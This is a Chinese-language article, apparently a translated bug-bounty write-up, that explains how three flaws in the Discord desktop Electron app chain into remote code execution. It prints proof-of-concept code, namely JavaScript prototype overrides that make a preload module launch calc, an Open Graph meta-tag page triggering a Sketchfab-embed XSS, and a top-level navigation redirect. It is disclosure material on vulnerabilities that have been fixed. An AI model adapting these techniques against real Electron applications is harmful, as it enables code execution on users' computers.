文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

综合三个Bug实现Discord桌面应用RCE漏洞

2024-12-03 17:53

关注

Discord 是一款适用于游戏玩家一体化语音和文字聊天的即时通信(IM)软件。 目前 Discord 已经覆盖 Windows、MacOS、Android、iOS、Windows Phone等多种主流平台。

我选择测试Discord的原因

由于我对Electron架构的APP漏洞测试比较有经验,而刚好Discord应用正是基于Electron架构开发的,且我也是一名Discord用户,所以本着测试把玩的心态,我就对Discord进行了分析。

发现的漏洞

我发现了以下Discord应用存在的三个bug,综合利用最终形成了RCE漏洞:

contextIsolation功能未启用(Missing contextIsolation)

在测试Electron架构时,通常我会先检查BrowserWindow API的选项,当创建浏览器窗口时BrowserWindow API会被调用。测试时,我就在想,当Electron渲染器(renderer)加载时,怎样的任意JS代码执行才会引起RCE?

虽然Discord的Electron架构并不是开源的,但Electron的JS代码是保存在应用本地,所以我是可以提取查看到的。通过本地JS代码的查看,我发现在APP主界面后台下,使用了以下方法函数:

  1. const mainWindowOptions = { 
  2.   title: 'Discord', 
  3.   backgroundColor: getBackgroundColor(), 
  4.   width: DEFAULT_WIDTH, 
  5.   height: DEFAULT_HEIGHT, 
  6.   minWidth: MIN_WIDTH, 
  7.   minHeight: MIN_HEIGHT, 
  8.   transparent: false, 
  9.   frame: false, 
  10.   resizable: true, 
  11.   show: isVisible, 
  12.   webPreferences: { 
  13.     blinkFeatures: 'EnumerateDevices,AudioOutputDevices', 
  14.     nodeIntegration: false, 
  15.     preload: _path2.default.join(__dirname, 'mainScreenPreload.js'), 
  16.     nativeWindowOpen: true, 
  17.     enableRemoteModule: false, 
  18.     spellcheck: true 
  19.   } 
  20. }; 

从上述代码片段中,可以看出,我们着重需要检查的是其中的nodeIntegration和contextIsolation配置,这里的nodeIntegration都被配置为了false,且原先未修改版本的和contextIsolation也被配置为了false。

如果nodeIntegration为true,那么web页面的JS代码可以通过调用require()方法使用Node.js功能。比如,在Windows系统中执行以下计算器calc.exe程序的代码:

  1. <script> 
  2.   require('child_process').exec('calc'); 
  3. script> 

而在Discord这里,nodeIntegration为false,所以我也不能调用require()去使用Node.js功能。然而,仍然存在一种访问Node.js功能的方法。接下来且听我慢慢解释。

Discord中的另一重要功能contextIsolation也配置为了false,该功能用来隔离不信任的内容,所以,如果你想消除RCE,那么该功能就不应该配置为false。如果contextIsolation为false,那么web页面中的JS可以影响Electron内部渲染时的JS代码和预加载脚本执行,(这里Electron内部渲染时的JS代码指Web页面之外的JS脚本),例如,假设用Web页面JS中的方法函数,把Electron内置JS的方法Array.prototype.join覆盖掉,那么Web页面之外的JS脚本在加载join方法时,就会调用后来被覆盖的方法函数。

这种行为是很危险的,因为这样一来,可以不用考虑nodeIntegration配置,直接用覆盖的方式,就可以让Electron允许Web页面之外的JS脚本使用Node.js特性,这种方式即使在nodeIntegration配置为false的情况下,都还还可演变为RCE漏洞。

我顺便提一下,类似的缺陷早在2016年我在Cure53公司时就已经发现了,当时我上报给了Electron安全团队,后来在Electron架构中就引入了contextIsolation功能。以下为最近才公开的技术细节PDF:

contextIsolation功能的引入目的在于隔离Web页面和Web页面之外的JS代码,让它们在执行时不会产生相互影响。该功能非常有必要,因为如果存在不被信任的内容或操作,就会产生安全问题。而在Discord这里,该功能却被配置为false,被禁用了。因此,遵循上述覆盖JS脚本的方法,我对Discord的此处缺陷发起了测试。

由于Electron内置的JS代码在渲染时可以在任意的Electron APP中执行,所以一般我测试Electron的RCE时,习惯首先在渲染时用Electron内置的JS代码来测试。在我的文章中,我写到了可以用Electron在执行navigation timing时的代码来实现RCE,该缺陷不仅可以从代码中发现,还可从其它地方发现(以后我会公布详细的PoC实例)。但是,由于目标应用不同的Electron版本使用或BrowserWindow选项设置,Discord这里Electron运行启动时,我实际测试的PoC总是不稳定,所以我把测试重点放在了预加载脚本上。

测试预加载脚本时,我发现Discord应用曝露了DiscordNative.nativeModules.requireModule('MODULE-NAME')方法函数,该函数功能在于可以通过其把一些模块功能调用到Web页面中去实现。然而,经测试发现,我并不能有效地调用类似child_process的模块实现RCE,但却可以用之前说过的覆盖方法,覆盖掉Discord Electron中内置的JS方法,干扰曝露模块的执行,以此实现RCE。

以下为相关的PoC。当覆盖掉Discord Electron中内置的RegExp.prototype.test和Array.prototype.join方法,调用"discord_utils"模块中定义的getGPUDriverVersions方法函数时,可以触发执行calc.exe程序:

  1. RegExp.prototype.test=function(){ 
  2.     return false; 
  3. Array.prototype.join=function(){ 
  4.     return "calc"; 
  5. DiscordNative.nativeModules.requireModule('discord_utils').getGPUDriverVersions(); 

getGPUDriverVersions方法函数用来执行"execa"库调用:

  1. module.exports.getGPUDriverVersions = async () => { 
  2.   if (process.platform !== 'win32') { 
  3.     return {}; 
  4.   } 
  5.  
  6.   const result = {}; 
  7.   const nvidiaSmiPath = `${process.env['ProgramW6432']}/NVIDIA Corporation/NVSMI/nvidia-smi.exe`; 
  8.  
  9.   try { 
  10.     result.nvidia = parseNvidiaSmiOutput(await execa(nvidiaSmiPath, [])); 
  11.   } catch (e) { 
  12.     result.nvidia = {error: e.toString()}; 
  13.   } 
  14.  
  15.   return result; 
  16. }; 

通常,"execa"库又是用来执行nvidiaSmiPath变量中指定的"nvidia-smi.exe"显卡程序的,但由于覆盖掉了RegExp.prototype.test 和 Array.prototype.join方法,"execa"库中nvidiaSmiPath变量名即被覆盖为了"calc"。

具体来说,nvidiaSmiPath中的变量覆盖需要改变以下两个JS文件:

到了这步,"nvidia-smi.exe"可以成功被替换为"calc",那么接下来只需找到执行JS代码的方式即可成功实现RCE了。

iframe嵌入功能中的XSS

在我尝试挖掘XSS的过程中,我发现Discord APP支持类似autolink或Markdown的功能,这有点意思。经测试,如果Discord用户交流信息中有视频帖子,如You-tube URL,那么这里类似Markdown的iframe嵌入功能即可显示出视频播放器(video player)来。

由于Discord涉及到用户的各种社交交流信息,所以其支持Open Graph Protocol(开放内容协议),如果用户交流信息中包含OGP信息,那么Discord应用即会显示出其中出现的网页、描述、缩略图和一些相关的视频内容。当用户交流信息中的视频URL链接被嵌入到iframe中后,Discord应用会提取出该视频URL链接。后续,我无法查看到Discord应用相关的iframe嵌入功能说明文档,就只好在其CSP frame-src 指令中寻找线索,发现其采用了以下CSP策略:

  1. Content-Security-Policy: [...] ; frame-src https://*.you-tube.com https://*.twitch.tv https://open.spotify.com https://w.soundcloud.com https://sketchfab.com https://player.vimeo.com https://www.funimation.com https://twitter.com https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/ https://js.stripe.com https://assets.braintreegateway.com https://checkout.paypal.com https://*.watchanimeattheoffice.com 

可以看到,其中列出了允许iframe嵌入的策略(如对You-Tube, Twitch, Spotify视频的嵌入)。接下来,我就对这些域名一个一个进行测试,希望在其中能在iframe视频嵌入时触发XSS。经过测试,我发现域名sketchfab.com可以在iframe嵌入时产生XSS,这是一个简单的DOM-based XSS。以下是我根据OGP协议制作的一个PoC,当我把该URL链接以聊天方式发送给另一位Discord用户时,点击其中的iframe,就会触发任意的JS代码执行:

https://l0.cm/discord_rce_og.html

  1. <head> 
  2.     <meta charset="utf-8"> 
  3.     <meta property="og:title" content="RCE DEMO"> 
  4.     [...] 
  5.     <meta property="og:video:url" content="https://sketchfab.com/models/2b198209466d43328169d2d14a4392bb/embed"> 
  6.     <meta property="og:video:type" content="text/html"> 
  7.     <meta property="og:video:width" content="1280"> 
  8.     <meta property="og:video:height" content="720"> 
  9. head> 

现在,虽然发现了XSS,但是触发的JS代码却只能在iframe中执行。由于Electron不会把“Web页面之外的JS代码”加载进入iframe中,所以即使我覆盖了其iframe内置的JS方法,还是不能调用Node.js相关功能。因此,要实现真正的RCE,还需要跳出iframe限制,在用户浏览内容层面去考虑。这就需要在iframe框架中创建一个新窗口,或是从iframe中导航(navigating)到另一URL中的顶层窗口。

经过对相关代码的分析,我发现Navigation restriction(导航限制)的主要代码中用到了"new-window" 和 "will-navigate"两个事件:

  1. mainWindow.webContents.on('new-window', (e, windowURL, frameName, disposition, options) => { 
  2.   e.preventDefault(); 
  3.   if (frameName.startsWith(DISCORD_NAMESPACE) && windowURL.startsWith(WEBAPP_ENDPOINT)) { 
  4.     popoutWindows.openOrFocusWindow(e, windowURL, frameName, options); 
  5.   } else { 
  6.     _electron.shell.openExternal(windowURL); 
  7.   } 
  8. }); 
  9. [...] 
  10. mainWindow.webContents.on('will-navigate', (evt, url) => { 
  11.   if (!insideAuthFlow && !url.startsWith(WEBAPP_ENDPOINT)) { 
  12.     evt.preventDefault(); 
  13.   } 
  14. }); 

只要突破这里,就可以在iframe框架中创建一个新窗口,或是从iframe中导航(navigating)到另一URL中的顶层窗口。然而,这里存在着一个让我完全意想不到的缺陷。

Navigation restriction bypass (导航限制功能绕过,CVE-2020-15174)

在我对导航限制相关代码进行检查过程中,我本认为iframe对导航(navigation)应该是有限制的,但我惊奇地发现,iframe不知怎的对导航机制竟然没有限制。我本来想着,"will-navigate"事件和preventDefault()会在导航动作绕过发生之前进行相关的捕捉或拦截,但是这却没有。

为了进行导航绕过测试,我创建了一个简单的Electron应用,然后发现,顶部导航(top navigation)中的"will-navigate" 事件并不会从iframe中跳出,具体来说,如果顶部导航的所属域和iframe的所属域相同,"will-navigate" 事件会跳出,否则就不会跳出。这并不是一种合乎常理的操作行为,而是个Bug。有了这个Bug,我就能绕过导航限制了。最后,我要做的就是,导航到可以触发XSS的iframe页面,然后在其中包含进RCE Payload代码。

  1. top.location="//l0.cm/discord_calc.html" 

最终,综合利用以上三个Bug,我成功在Discord应用中实现的远程代码执行(RCE)。

POC视频:https://tinyurl.com/y5nx6zjy

漏洞处理

我通过Discord众测项目上报了这三个漏洞,之后,Discord安全团队禁用了Sketchfab的嵌入功能,然后在iframe中加入了沙箱功能防止导航限制绕过,同时启用了contextIsolation功能。我因此收获了$5,000的漏洞奖励。

https://github.com/electron/electron/security/advisories/GHSA-2q4g-w47c-4674

另外,其中的XSS漏洞上报给Sketchfab后,收获了Sketchfab奖励的$300;"will-navigate"事件Bug上报给Electron后,被分配了CVE-2020-15174的漏洞编号。

参考来源:mksben

 

来源:FreeBuf内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯